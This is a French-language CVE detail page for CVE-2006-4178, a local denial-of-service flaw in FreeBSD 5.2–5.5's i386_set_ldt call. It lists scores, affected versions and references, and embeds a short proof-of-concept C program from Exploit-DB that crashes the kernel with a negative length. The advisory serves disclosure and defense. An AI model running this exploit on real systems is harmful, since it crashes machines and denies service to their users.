CVE-2006-4178 : Détail

CVE-2006-4178

0.04%V3
Local
2006-09-25
23h43 +00:00
2018-10-17
18h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Integer signedness error in the i386_set_ldt call in FreeBSD 5.5, and possibly earlier versions down to 5.2, allows local users to cause a denial of service (crash) via unspecified arguments that use negative signed integers to cause the bzero function to be called with a large length parameter, a different vulnerability than CVE-2006-4172.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 28648

Date de publication : 2006-09-22 22h00 +00:00
Auteur : Adriano Lima
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/20158/info FreeBSD is prone to multiple local denial-of-service vulnerabilities. These issues occur because of input-validation flaws related to the handling of integers. An attacker may leverage these issues to cause the affected computer to crash, denying service to legitimate users. Versions 5.2 through 5.5 are vulnerable to these issues; other versions may also be affected. #include <stdio.h> #include <stdlib.h> #include <machine/segments.h> #include <machine/sysarch.h> int main(int argc,char **argv){ if(i386_set_ldt(LUDATA_SEL+1,NULL,-1)==-1){ perror("i386_set_ldt"); exit(EXIT_FAILURE); } exit(EXIT_FAILURE); }

Products Mentioned

Configuraton 0

Freebsd>>Freebsd >> Version To (including) 5.5

Freebsd>>Freebsd >> Version 5.2

Freebsd>>Freebsd >> Version 5.2.1

Freebsd>>Freebsd >> Version 5.3

Freebsd>>Freebsd >> Version 5.4

Références

http://securitytracker.com/id?1016927
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/22064
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/20158
Tags : vdb-entry, x_refsource_BID
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=415
Tags : third-party-advisory, x_refsource_IDEFENSE